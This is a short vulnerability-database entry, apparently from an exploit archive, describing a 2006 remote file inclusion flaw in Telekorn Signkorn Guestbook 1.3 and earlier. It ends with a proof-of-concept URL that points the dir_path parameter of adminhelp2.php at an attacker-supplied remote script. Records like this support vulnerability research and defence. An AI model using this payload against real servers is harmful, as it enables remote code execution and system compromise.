Telekorn Signkorn Guestbook 1.x - helpenadminhelp2.php?dir_path Remote File Inclusion

2006-09-12T00:00:00
ID EXPLOITPACK:5BBB7D7F5E041E7DC0E59DC2F8D57AF7
Type exploitpack
Reporter ThE_LeO
Modified 2006-09-12T00:00:00

Description

Telekorn Signkorn Guestbook 1.x - helpenadminhelp2.php?dir_path Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/19977/info
        
Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
        
This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
        
Versions 1.3 and earlier are affected by this issue.

http://www.example.Com/[Script]/help/en/adminhelp2.php?dir_path=[U r Evil Script] ;